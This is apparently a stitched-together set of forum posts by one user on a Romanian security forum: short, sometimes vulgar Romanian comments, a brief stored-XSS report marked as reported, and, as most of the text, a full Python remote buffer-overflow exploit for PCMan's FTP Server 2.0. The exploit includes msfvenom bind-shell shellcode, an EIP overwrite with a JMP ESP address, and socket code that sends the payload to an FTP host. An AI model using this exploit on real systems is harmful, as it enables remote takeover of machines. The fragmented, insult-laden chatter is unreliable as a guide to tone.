Anonym13

,,I did it for lulz'' lulzsec?

Vad ca te impaci cu ideea.

Avast da... hahahha

-

E security-research coaie , nu poti numi asa ceva ,,Apostrofeala grupa mare'' fa si tu asta , unii dintre cei mai buni castiga lunar 40k. haahhhaha , parlitule Bravo @dekeeu , la mai multe !

Daca crezi ca deekeu se ocupa cu d-astea GG.

Mersi mult. In caz ca le-ai descarcat , poti face o arhiva cu toate partile ? Mersi.

PHP.

,,La prima vedere pare un site normal'' =)))) Eu n-as zice !

Exploit Author: Koby , muie cu cacat

i don't know. domn' profesor.

#!/usr/bin/python # Exploit Title: PCMan's FTP Server v2.0 - RENAME command remote buffer overflow # Date: 29 Aug 2015 # Exploit Author: Koby # Vendor Homepage: http://pcman.openfoundry.org/ # Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z # Version: 2.0.7 # Tested on: Windows XP SP3 import socket import sys # msfvenom -p windows/shell_bind_tcp lhost=192.168.1.130 lport=4444 -b '\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d' -f ruby # Payload size: 352 bytes shellcode = ( "\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" "\x0e\xb3\x93\xd2\x17\x83\xee\xfc\xe2\xf4\x4f\x7b\x50\x17" "\xb3\x93\xb2\x9e\x56\xa2\x12\x73\x38\xc3\xe2\x9c\xe1\x9f" "\x59\x45\xa7\x18\xa0\x3f\xbc\x24\x98\x31\x82\x6c\x7e\x2b" "\xd2\xef\xd0\x3b\x93\x52\x1d\x1a\xb2\x54\x30\xe5\xe1\xc4" "\x59\x45\xa3\x18\x98\x2b\x38\xdf\xc3\x6f\x50\xdb\xd3\xc6" "\xe2\x18\x8b\x37\xb2\x40\x59\x5e\xab\x70\xe8\x5e\x38\xa7" "\x59\x16\x65\xa2\x2d\xbb\x72\x5c\xdf\x16\x74\xab\x32\x62" "\x45\x90\xaf\xef\x88\xee\xf6\x62\x57\xcb\x59\x4f\x97\x92" "\x01\x71\x38\x9f\x99\x9c\xeb\x8f\xd3\xc4\x38\x97\x59\x16" "\x63\x1a\x96\x33\x97\xc8\x89\x76\xea\xc9\x83\xe8\x53\xcc" "\x8d\x4d\x38\x81\x39\x9a\xee\xfb\xe1\x25\xb3\x93\xba\x60" "\xc0\xa1\x8d\x43\xdb\xdf\xa5\x31\xb4\x6c\x07\xaf\x23\x92" "\xd2\x17\x9a\x57\x86\x47\xdb\xba\x52\x7c\xb3\x6c\x07\x7d" "\xbb\xca\x82\xf5\x4e\xd3\x82\x57\xe3\xfb\x38\x18\x6c\x73" "\x2d\xc2\x24\xfb\xd0\x17\xa2\xcf\x5b\xf1\xd9\x83\x84\x40" "\xdb\x51\x09\x20\xd4\x6c\x07\x40\xdb\x24\x3b\x2f\x4c\x6c" "\x07\x40\xdb\xe7\x3e\x2c\x52\x6c\x07\x40\x24\xfb\xa7\x79" "\xfe\xf2\x2d\xc2\xdb\xf0\xbf\x73\xb3\x1a\x31\x40\xe4\xc4" "\xe3\xe1\xd9\x81\x8b\x41\x51\x6e\xb4\xd0\xf7\xb7\xee\x16" "\xb2\x1e\x96\x33\xa3\x55\xd2\x53\xe7\xc3\x84\x41\xe5\xd5" "\x84\x59\xe5\xc5\x81\x41\xdb\xea\x1e\x28\x35\x6c\x07\x9e" "\x53\xdd\x84\x51\x4c\xa3\xba\x1f\x34\x8e\xb2\xe8\x66\x28" "\x22\xa2\x11\xc5\xba\xb1\x26\x2e\x4f\xe8\x66\xaf\xd4\x6b" "\xb9\x13\x29\xf7\xc6\x96\x69\x50\xa0\xe1\xbd\x7d\xb3\xc0" "\x2d\xc2") # buffer overflow was found by fuzzing with ftp_pre_post (metasploit) # bad data is a string of 2004 "A" characters to get to a EIP overwrite # followed by the JMP ESP instruction 0x7cb48eed in SYSTEM32.dll baddata = '\x41'*2004+'\xed\x8e\xb4\x7c' # login to ftp followed by sending the bad data & payload s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('192.168.1.135',21)) s.recv(1024) s.send('USER anonymous\r\n') s.recv(1024) s.send('PASS anonymous\r\n') s.recv(1024) s.send('RENAME ' + baddata +'\x90'*50+ shellcode+ '\r\n') s.close()

Author : Anonym13 Type of xss : Stored. P.o.C : http://i.imgur.com/4J30faN.png Stauts : Reported.

https://rstforums.com/forum/103694-xss-cloud-center-ro.rst

Bravo , e cel din template ?